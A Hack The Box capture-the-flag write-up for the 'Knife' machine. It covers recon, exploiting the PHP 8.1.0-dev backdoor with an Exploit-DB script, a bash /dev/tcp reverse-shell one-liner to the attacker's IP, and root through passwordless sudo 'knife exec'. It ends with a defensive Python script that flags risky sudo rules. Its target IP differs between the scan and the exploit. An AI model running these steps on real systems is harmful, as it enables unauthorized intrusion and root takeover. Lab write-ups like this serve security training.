🕵 HTB-Writeup : KNIFE

Recon

Nmap scan

With nmap we found two open ports: a web server and an SSH server.

# basic scan
nmap -A -sV -Pn 10.10.10.40

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Vulnerabilities

Thanks to Wappalyzer, we found the versions of Apache and PHP:

  • Apache 2.4.41
  • PHP 8.1.0

We search for known vulnerabilities in Exploit-DB.

./searchsploit apache 2.4.41 # nothing

./searchsploit php 8.1.0
# PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                              | php/webapps/49933.py
# PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode) | php/webapps/14320.pl
# PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection                            | php/webapps/18148.pl
# PHP-Nuke 8.1.0.3.5b - Remote Command Execution                                   | php/webapps/14319.pl

The first hit is a known RCE for exactly that PHP version (8.1.0-dev). Let's try to exploit this vulnerability.

Exploit

Entry point

We try the first script found with searchsploit:

# PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
python3 exploitdb/exploits/php/webapps/49933.py 
Enter the full host url:
http://10.10.10.242/icons/

$ whoami
james

We got our first shell, running as the james user. Next we upgrade it to a clean reverse shell.

# on host
nc -lvnp 4444
# on target
bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"

We can get the first user flag.

Privesc

First I check whether there are commands that the user james can run with sudo.

# list commands that james can run with sudo 
sudo -l

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

We can see that james can run knife as root without entering a password. Let's check what options knife accepts; maybe one of its sub-commands lets us execute commands.

knife --help

** EXEC COMMANDS **
knife exec [SCRIPT] (options)

Bingo! After reading the help output I found the exec sub-command, which allows us to execute code. Let's try to pop a root shell!

sudo -u root knife exec '/bin/bash'
ERROR: SyntaxError: /bin/bash: Invalid char `\x7F' in expression
       /bin/bash: Invalid char `\x02' in expression
       /bin/bash: Invalid char `\x01' in expression
       /bin/bash: Invalid char `\x01' in expression

I first get an error: knife exec expects a script file, so it tried to parse the /bin/bash binary as source code and choked on its binary characters. The -E option allows passing the code to run directly on the command line.

# let's try the -E option to pass the command inline
sudo -u root knife exec -E 'exec "/bin/bash"'
whoami
root

We are root! We can get the root flag and close the box!
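As an added defensive check, not part of the original writeup: the following Python script parses sudo -l output like the one above and flags NOPASSWD rules that run a code-executing binary (such as knife, whose exec sub-command evaluates Ruby) as root. The list of such binaries is an assumption for this example, illustrative rather than exhaustive, and the sample input is constructed from the writeup's output plus one made-up rule.

```python
import re

# Binaries whose ordinary sub-commands evaluate code or spawn a shell.
# Illustrative list (an assumption for this example), not exhaustive.
CODE_EXEC_BINARIES = {"knife", "ruby", "python", "python3", "perl", "bash",
                      "sh", "vim", "vi", "less", "find", "awk", "env"}

# One sudo rule line, e.g. "    (root) NOPASSWD: /usr/bin/knife"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")

# Constructed sample: the writeup's sudo -l output plus one made-up rule
# (vim, but with a password required) that must not be flagged.
SAMPLE = """\
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/vim
"""

def parse_sudo_l(text):
    """Return one dict per rule: runas user, NOPASSWD flag, command string."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # rule lines follow this header
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = re.findall(r"\w+(?=:)", m.group("tags"))   # e.g. NOPASSWD, SETENV
        rules.append({"runas": m.group("runas").strip(),
                      "nopasswd": "NOPASSWD" in tags,
                      "cmd": m.group("cmd").strip()})
    return rules

def risky_rules(rules):
    """Flag passwordless root rules whose command can run arbitrary code.
    Returns (runas, command, basename) tuples; a bare 'ALL' is always flagged."""
    findings = []
    for r in rules:
        as_root = r["runas"].split(":")[0].strip() in ("root", "ALL")
        if not (as_root and r["nopasswd"]):
            continue
        for cmd in (c.strip() for c in r["cmd"].split(",")):   # "a, b" = two commands
            binary = "ALL" if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
            if binary == "ALL" or binary in CODE_EXEC_BINARIES:
                findings.append((r["runas"], cmd, binary))
    return findings

if __name__ == "__main__":
    for runas, cmd, binary in risky_rules(parse_sudo_l(SAMPLE)):
        print(f"RISK: ({runas}) NOPASSWD {cmd} -> {binary} can execute arbitrary code")
```

Run against real sudo -l output by piping it in, or wire the parser into a host audit; the knife line is the only finding on the sample.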

Tags

PHP, Backdoor, Easy, External, Apache, Penetration Tester Level 1, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Sudo Exploitation, Enumeration